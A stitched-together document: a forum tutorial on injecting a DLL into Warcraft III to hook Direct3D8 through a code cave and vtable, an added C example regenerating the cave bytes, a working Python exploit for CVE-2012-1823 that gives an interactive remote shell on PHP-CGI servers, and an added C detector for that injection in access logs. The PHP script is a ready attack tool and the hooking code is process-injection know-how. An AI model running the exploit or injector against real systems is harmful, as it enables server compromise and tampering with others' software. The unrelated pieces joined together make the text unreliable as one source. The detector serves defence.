If you can, switch the game to windowed mode (breakpoints don't f*** up like with fullscreen d3d apps). But we're busy with Warcraft here, remember, and it doesn't have that option. Oh well.

Alt-tab and check your C: drive. If the hook worked you should have a nice little d3d_log.txt waiting for you. Open it up and copy the address of your d3d device. Mine is 6E7100.

Run OllyDbg and attach to war3.exe. Hit alt+e to see a list of executable modules. Look for d3d8.dll. Right click on it and say copy->base. Store this somewhere for later. Detach olly from the process (as in DETACH it, make sure the game does not exit! We are still working).

Fire up CheatEngine and manually add the address of your device (eg mine being 6E7100). Right click on it and select "Find out what accesses this address". Alt-tab in and out of the game. You should have a nice long list of instructions that access your device pointer. We want to find one located in the d3d8.dll module because any other DirectX8 game will load this as well. Remember that base address you took down? You're gonna need it now. Mine was 68B90000. Look for an instruction in the list that looks like it was called from this module. Here is a picture as an example. For the sake of the tutorial I'll use the one that I've already used in the final dll. On this run it is located at 68BFCBF7.

The thing is, this address cannot be hardcoded because it will change whenever d3d8.dll is loaded at a different base address. We can find it every time, though. We just need its OFFSET from the base of the module. Base + Offset = Address. What we do is subtract the base from our address to get the offset:

    68BFCBF7 - 68B90000 = 6CBF7

This offset will always stay the same. Weo. What we are going to do now is use this instruction to get the pointer every time.

Let's hit a bit more olly. Attach to war3.exe again (make sure you close Cheat Engine first else olly will puke on you). Hit ctrl+g and paste in the address of your instruction. Hit enter.
If all went well you should be here:

What we want to do is set up a code cave and steal the address. We need an empty space in the code where we can do our own thing. If you hit ctrl+end you should be at the bottom of the d3d8 module. There are a lot of zeroes here which is perfect for us. Hit ctrl+g and move back to where we were. What we want to do is set up a JMP instruction into empty space and set up our cave. For the purpose of the tutorial I'm going to be jumping to BASE + F3FC5. Hit space on your instruction to assemble the jmp. In this case I have a

Hit enter on it to jump to our cave. We have to restore the instructions we overwrote by assembling the jump though. So hit space and fill in the first one. Then the second. The address of our device is currently in EAX so let's put that somewhere where we can find it. 4 bytes above the cave sounds good to me. So we MOV the pointer to an address that we know and JMP back to the next real instruction. Don't run this now, you will get an access violation when trying to write to that address. We will VirtualProtect it later.

If you press ctrl+a to analyse the code and it doesn't come out scrambled it should all be fine. Hit enter on the jmps to see if they go to the right place. We have ourselves a nice working code cave.

If we want to inject this we will need the assembled bytecodes. Start with the jump. Select it and press ctrl+insert to binary copy. Save this somewhere. Do the same for the entire cave (make sure to select it all).

Phew. Time to code this baby. Create a new win32 dll project and call it d3d.
Add another main.cpp. When we attach we want to run the code injector and address grabber in a new thread, else the game will hang and never execute the code we want :/ So we have:

    #include <windows.h>
    #include <tlhelp32.h>

    DWORD WINAPI Patch_StealD3d8Device(LPVOID param);
    DWORD WINAPI HookAPI(LPVOID param);
    DWORD* GetModuleBaseAddress(DWORD iProcId, char* DLLName);

    BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)
    {
        if (ul_reason_for_call == DLL_PROCESS_ATTACH) {
            DisableThreadLibraryCalls(hModule);
            CreateThread(0, 0, Patch_StealD3d8Device, 0, 0, 0);
        }
        return TRUE;
    }

The code injector routine looks as follows:

    DWORD WINAPI Patch_StealD3d8Device(LPVOID param)
    {
        // Acquire base address of d3d8.dll
        int base_d3d8 = (int)GetModuleBaseAddress(GetCurrentProcessId(), "d3d8.dll");

        // add offsets to get addresses
        const int addr_jmp   = base_d3d8 + 0x00076E33;
        const int addr_cave  = base_d3d8 + 0x000F3FC9;
        const int addr_value = base_d3d8 + 0x000F3FC5;

        // The bytecode we got
        byte jmp[] = "\xE9\x91\xD1\x07";   // last ACTUAL byte is \x00 which works out with a null-terminated string
        byte cave[] = "\x8B\x06\x8B\x48\x08\x89\x35\xC5\x3F\x0B\x6D\xE9\x5F\x2E\xF8\xFF";   // This null-terminated
                                                                                          // buddy is ok because it's floating in a sea of zeroes

        // virtualprotect the addresses for writing
        DWORD lpflOldProtect;

        // write jmps
        VirtualProtect((void*)addr_jmp, sizeof(jmp), PAGE_EXECUTE_READWRITE, &lpflOldProtect);
        memcpy((void*)addr_jmp, (void*)jmp, sizeof(jmp));
        VirtualProtect((void*)addr_jmp, sizeof(jmp), lpflOldProtect, &lpflOldProtect);

        // write caves
        VirtualProtect((void*)addr_cave, sizeof(cave), PAGE_EXECUTE_READWRITE, &lpflOldProtect);
        memcpy((void*)addr_cave, (void*)cave, sizeof(cave));
        // modify code to make sure that we store in the right place
        *(int*)(addr_cave + 7) = addr_value;
        VirtualProtect((void*)addr_cave, sizeof(cave), lpflOldProtect, &lpflOldProtect);

        // protect value addr for writing
        VirtualProtect((void*)addr_value, sizeof(DWORD), PAGE_EXECUTE_READWRITE, &lpflOldProtect);

        // Wait for the value of the vtable and hook stuff
        HANDLE hThread = CreateThread(0, 0, HookAPI, 0, 0, 0);
        WaitForSingleObject(hThread, INFINITE);

        // restore jmp
        byte orig[] = {0x8B, 0x06, 0x8B, 0x48, 0x08};
        VirtualProtect((void*)addr_jmp, sizeof(orig), PAGE_EXECUTE_READWRITE, &lpflOldProtect);
        memcpy((void*)addr_jmp, (void*)orig, sizeof(orig));
        VirtualProtect((void*)addr_jmp, sizeof(orig), lpflOldProtect, &lpflOldProtect);

        return 1;
    }

The reason for the

    *(int*)(addr_cave + 7) = addr_value;

is that we cannot have any hardcoded addresses. We write the real address to the right place in the code.

We are almost ready to hook. We create a new thread that reads in the address of the device pointer. Using that we can use a vtable hook on whichever methods we want:

    // globals
    DWORD* pVtable;

    DWORD WINAPI HookAPI(LPVOID param)
    {
        // Acquire base address of d3d8.dll
        int base_d3d8 = (int)GetModuleBaseAddress(GetCurrentProcessId(), "d3d8.dll");
        const int addr_value = base_d3d8 + 0x000F3FC5;

        Sleep(100);   // wait for address to get written

        // protect value addr for reading / writing
        DWORD lpflOldProtect;
        VirtualProtect((void*)addr_value, sizeof(DWORD), PAGE_EXECUTE_READWRITE, &lpflOldProtect);

        // poll the value until it gets written by our cave
        DWORD result = 0;
        while (!result) {
            result = *(DWORD*)addr_value;
            Sleep(10);
        }

        // find the vtable
        pVtable = GetVtableAddress((void*)result);

        // APPLY THE HOOK, FINALLY!!!
        HookFunction(pVtable, (void*)&hook_EndScene, (void*)&orig_EndScene, 35);
        HookFunction(pVtable, (void*)&hook_DrawIndexedPrimitive, (void*)&orig_DrawIndexedPrimitive, 71);
        HookFunction(pVtable, (void*)&hook_Present, (void*)&orig_Present, 15);
        HookFunction(pVtable, (void*)&hook_SetStreamSource, (void*)&orig_SetStreamSource, 83);

        return 1;
    }

I almost forgot. The code to get the base address of a loaded module was written by Sheep afaik and is as follows:

    // Project must not be unicode else this will not compile
    DWORD* GetModuleBaseAddress(DWORD iProcId, char* DLLName)
    {
        HANDLE hSnap;            // Process snapshot handle.
        MODULEENTRY32 xModule;   // Module information structure.
hSnap = CreateToolhelp32Snapshot(TH32CS_SNAPMODULE, iProcId); // Creates a module // snapshot of the // game process. xModule.dwSize = sizeof(MODULEENTRY32); // Needed for Module32First/Next to work. if (Module32First(hSnap, &xModule)) // Gets the first module. { do { if (strcmp(xModule.szModule, DLLName) == 0) // If this is the module we want... { CloseHandle(hSnap); // Free the handle. return (DWORD*)xModule.modBaseAddr; // return the base address. } } while (Module32Next(hSnap, &xModule)); // Loops through the rest of the modules. } CloseHandle(hSnap); // Free the handle. return 0; // If the result of the function is 0, it didn't find the base address. // i.e.. the dll isn't loaded. } Hooking the functions now is as straightforward as it was to hook CreateDevice earlier. Just as an example to get you going the hook code for EndScene would look like this: // hooks.h #include <d3d8.h> #include <d3dx8.h> //EndScene (offset : 35) typedef HRESULT (APIENTRY *EndScene_t)(IDirect3DDevice8*); HRESULT APIENTRY hook_EndScene(IDirect3DDevice8* pInterface); extern EndScene_t orig_EndScene; // hooks.cpp //Endscene EndScene_t orig_EndScene; HRESULT APIENTRY hook_EndScene(IDirect3DDevice8* pInterface) { __asm pushad // just a check D3DRECT rec = {0, 0, 20, 20}; pInterface->Clear(1, &rec, D3DCLEAR_TARGET, D3DCOLOR_XRGB(255, 0, 0), 0, 0); __asm popad return orig_EndScene(pInterface); } And viola, we have a working runtime hook I used text instead of the Clear but whatever Conclusion There is a slight issue with this code and that is the code injection. I dont know if those offsets will work with other installs of directx. I doubt it though :/ lol. One could probably redistribute the correct d3d8.dll with the hook or something . Il attach it and the final release build if any1 wants to test it on a dx8 game . Ive run it on warcraft and ut2004 (which used dx8??) and it worked both times . 
Writing this has really taken a while and raped my fingers but I'm glad I can finally share something. I've learnt a lot doing this and I hope reading it has taught you something new as well.

Thanks to everyone who has helped me on this and whose code I have used or tutorials I have followed:
illuz1oN
Bobbysing (Gamedeception)
xXx (http://paste.lisp.or...splay/58743/raw)
Uranium-239
Darawk
Sheep

COPYRIGHT: Please do not copy this without written permission from me, only link to it.

Source: Run-time directx hooking using code injection and vtable - rohitab.com - Forums
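The two mechanisms the post hand-derives in the debugger can be checked programmatically. The following is an added example, not code from the post or its author: it encodes the E9 rel32 jump and the 16-byte cave from the post's own offsets (so the bytes can be regenerated for any d3d8.dll build instead of being hard-coded, which is the caveat the conclusion raises), verifies them against the arrays in the post (their disp32 0x6D0B3FC5 implies a module base of 0x6CFC0000, an assumption derived from those bytes), and applies the same vtable hook to a COM-style object constructed here. It is portable C: the object and its method table live in writable memory, so the VirtualProtect step the real hook needs on d3d8.dll's read-only data is not required.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* ---- 1. relative jump and code-cave encoding ---- */

/* Offsets quoted in the post, relative to the d3d8.dll base. */
#define OFF_JMP   0x00076E33u  /* site of the 5 bytes replaced by our jmp    */
#define OFF_CAVE  0x000F3FC9u  /* start of the cave in the module's zeroes   */
#define OFF_VALUE 0x000F3FC5u  /* 4 bytes above the cave: device pointer slot */

/* rel32 of an E9 jmp is measured from the end of the 5-byte instruction. */
int32_t jmp_rel32(uint32_t src, uint32_t dst)
{
    return (int32_t)(dst - (src + 5u));
}

static void put_le32(uint8_t *p, uint32_t v)
{
    p[0] = (uint8_t)v;         p[1] = (uint8_t)(v >> 8);
    p[2] = (uint8_t)(v >> 16); p[3] = (uint8_t)(v >> 24);
}

/* Writes E9 <rel32> (5 bytes) to out. */
void encode_jmp(uint32_t src, uint32_t dst, uint8_t out[5])
{
    out[0] = 0xE9;
    put_le32(out + 1, (uint32_t)jmp_rel32(src, dst));
}

/* The 16-byte cave for a given module base:
 *   8B 06          mov eax,[esi]            (restored original instruction)
 *   8B 48 08       mov ecx,[eax+8]          (restored original instruction)
 *   89 35 <disp32> mov [base+OFF_VALUE],esi (stash the pointer)
 *   E9 <rel32>     jmp base+OFF_JMP+5       (back to the next real instruction) */
void build_cave(uint32_t base, uint8_t out[16])
{
    static const uint8_t restored[5] = {0x8B, 0x06, 0x8B, 0x48, 0x08};
    memcpy(out, restored, 5);
    out[5] = 0x89; out[6] = 0x35;
    put_le32(out + 7, base + OFF_VALUE);
    encode_jmp(base + OFF_CAVE + 11, base + OFF_JMP + 5, out + 11);
}

/* 1 if the generated bytes equal the arrays hard-coded in the post. */
int matches_post_bytes(void)
{
    static const uint8_t post_jmp[5] = {0xE9, 0x91, 0xD1, 0x07, 0x00};
    static const uint8_t post_cave[16] = {0x8B, 0x06, 0x8B, 0x48, 0x08, 0x89, 0x35, 0xC5,
                                          0x3F, 0x0B, 0x6D, 0xE9, 0x5F, 0x2E, 0xF8, 0xFF};
    const uint32_t base = 0x6CFC0000u; /* assumed: 0x6D0B3FC5 - OFF_VALUE */
    uint8_t jmp[5], cave[16];
    encode_jmp(base + OFF_JMP, base + OFF_CAVE, jmp);
    build_cave(base, cave);
    return memcmp(jmp, post_jmp, 5) == 0 && memcmp(cave, post_cave, 16) == 0;
}

/* ---- 2. vtable hook on a COM-style object ---- */

typedef long (*method_t)(void *self, long arg);

/* COM layout: the first field of the object is the pointer to its vtable. */
typedef struct { method_t *vtable; long state; } Object;

#define SLOT_ADD 2 /* slot we hook; EndScene is slot 35 on IDirect3DDevice8 */

static long real_add(void *self, long arg) { Object *o = (Object *)self; o->state += arg; return o->state; }
static long real_noop(void *self, long arg) { (void)self; (void)arg; return 0; }

static method_t orig_add;  /* saved original, like orig_EndScene */
static int hook_hits;

/* The hook does its own work, then calls through the saved original. */
static long hook_add(void *self, long arg) { hook_hits++; return orig_add(self, arg * 2); }

/* GetVtableAddress: the vtable pointer is the object's first field. */
method_t *get_vtable(void *obj) { return *(method_t **)obj; }

/* HookFunction: save the original entry, then overwrite the slot. */
int hook_vtable_entry(method_t *vtable, method_t hook, method_t *orig, unsigned idx)
{
    if (!vtable || !hook || !orig || !vtable[idx]) return -1;
    *orig = vtable[idx];
    vtable[idx] = hook;
    return 0;
}

void unhook_vtable_entry(method_t *vtable, method_t orig, unsigned idx) { vtable[idx] = orig; }

/* Calls the slot before, during and after the hook with arg 5:
 * state goes 5 (plain) -> 15 (hook doubles arg) -> 20 (restored). */
long demo_vtable_hook(void)
{
    static method_t table[4];
    Object obj = { table, 0 };
    table[0] = real_noop; table[1] = real_noop; table[SLOT_ADD] = real_add; table[3] = real_noop;
    hook_hits = 0;

    get_vtable(&obj)[SLOT_ADD](&obj, 5);
    hook_vtable_entry(get_vtable(&obj), hook_add, &orig_add, SLOT_ADD);
    get_vtable(&obj)[SLOT_ADD](&obj, 5);
    unhook_vtable_entry(get_vtable(&obj), orig_add, SLOT_ADD);
    return get_vtable(&obj)[SLOT_ADD](&obj, 5);
}

int main(void)
{
    printf("generated bytes match the post: %d\n", matches_post_bytes());
    printf("vtable demo final state: %ld (hook hit %d time)\n", demo_vtable_hook(), hook_hits);
    return 0;
}
```

To target another d3d8.dll build, replace the three OFF_ constants with the offsets found in the debugger and call build_cave with the module base returned by GetModuleBaseAddress; everything else, including the back-jump, is recomputed.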
-
PHP-CGI Argument Injection Remote Code Execution

    #!/usr/bin/env python3
    import sys
    import requests

    print("""
    CVE-2012-1823 PHP-CGI Argument Injection Remote Code Execution
    This exploit abuses an argument injection in the PHP-CGI wrapper to execute code as the PHP user/webserver user.
    Feel free to give me abuse about this <3
    - infodox | insecurety.net | @info_dox
    """)

    if len(sys.argv) != 2:
        print("Usage: ./cve-2012-1823.py <target>")
        sys.exit(0)

    target = sys.argv[1]
    # The query string contains no unencoded '=', so the web server hands it to
    # php-cgi as command-line arguments: -d sets the two ini values below
    url = "http://" + target + "/?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input"
    prefix = "<?php system('"
    suffix = "');die(); ?>"

    print("[+] Connecting and spawning a shell...")
    while True:
        try:
            cmd = input("%s:~$ " % target)
            # auto_prepend_file=php://input makes php-cgi execute the POST body
            payload = prefix + cmd + suffix
            resp = requests.post(url, data=payload)
            print(resp.text)
        except KeyboardInterrupt:
            print("\n[-] Quitting")
            sys.exit(1)

Source: PHP-CGI Argument Injection Remote Code Execution - CXSecurity WLB
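The injection works because of a CGI rule, not a PHP parser bug: RFC 3875 section 4.4 says that when QUERY_STRING contains no unencoded "=" the server splits it on "+" and passes each percent-decoded word to the script as a command-line argument, and an unpatched php-cgi then treats words starting with "-" as its own switches (-d sets an ini directive, -s dumps the script source). The following is an added example, not part of the exploit post above: it applies that rule to a query string so requests like the one the script sends can be flagged in access logs. The sample queries are constructed, not captured traffic.

```c
#include <stdio.h>
#include <string.h>

#define MAX_WORDS 16
#define MAX_WORD  128

static int hexval(int c)
{
    if (c >= '0' && c <= '9') return c - '0';
    if (c >= 'a' && c <= 'f') return c - 'a' + 10;
    if (c >= 'A' && c <= 'F') return c - 'A' + 10;
    return -1;
}

/* Percent-decodes n bytes of src into dst (NUL-terminated).
 * Returns the decoded length, or -1 on a bad escape or overflow. */
static int url_decode(const char *src, size_t n, char *dst, size_t dst_len)
{
    size_t o = 0;
    for (size_t i = 0; i < n; i++) {
        int c = (unsigned char)src[i];
        if (c == '%') {
            if (i + 2 >= n) return -1;
            int h = hexval(src[i + 1]), l = hexval(src[i + 2]);
            if (h < 0 || l < 0) return -1;
            c = h * 16 + l;
            i += 2;
        }
        if (o + 1 >= dst_len) return -1;
        dst[o++] = (char)c;
    }
    dst[o] = '\0';
    return (int)o;
}

/* RFC 3875 4.4: a query with no unencoded '=' is "indexed"; the server splits
 * it on '+' and passes each decoded word as a command-line argument.
 * Returns the number of words, 0 for a non-indexed query, -1 on bad encoding. */
int cgi_argv_words(const char *query, char words[][MAX_WORD], int max_words)
{
    int n = 0;
    if (strchr(query, '=')) return 0;
    for (const char *p = query; n < max_words; ) {
        const char *plus = strchr(p, '+');
        size_t len = plus ? (size_t)(plus - p) : strlen(p);
        if (url_decode(p, len, words[n], MAX_WORD) < 0) return -1;
        n++;
        if (!plus) break;
        p = plus + 1;
    }
    return n;
}

/* 1 if php-cgi would have received at least one word as an option ('-...'). */
int is_php_cgi_arg_injection(const char *query)
{
    char words[MAX_WORDS][MAX_WORD];
    int n = cgi_argv_words(query, words, MAX_WORDS);
    for (int i = 0; i < n; i++)
        if (words[i][0] == '-') return 1;
    return 0;
}

/* Constructed sample query strings (not real traffic). The first is what the
 * exploit above sends; %3d keeps the '=' encoded so the query stays indexed. */
static const char *const SAMPLES[] = {
    "-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input",
    "-s",                                /* source disclosure variant */
    "page=1&-d+allow_url_include%3d1",   /* literal '=': not passed as argv */
    "search+terms",                      /* indexed but harmless */
};

/* Number of sample queries flagged. */
int count_flagged(void)
{
    int hits = 0;
    for (size_t i = 0; i < sizeof SAMPLES / sizeof SAMPLES[0]; i++)
        hits += is_php_cgi_arg_injection(SAMPLES[i]);
    return hits;
}

int main(void)
{
    for (size_t i = 0; i < sizeof SAMPLES / sizeof SAMPLES[0]; i++)
        printf("%-60s -> %s\n", SAMPLES[i],
               is_php_cgi_arg_injection(SAMPLES[i]) ? "ARG INJECTION" : "ok");
    return 0;
}
```

The check keys on the decoded words rather than on the literal "-d" text, so "%2dd" (an encoded dash) is caught as well, and a query that carries any literal "=" is left alone because the server would never have treated it as an argument list.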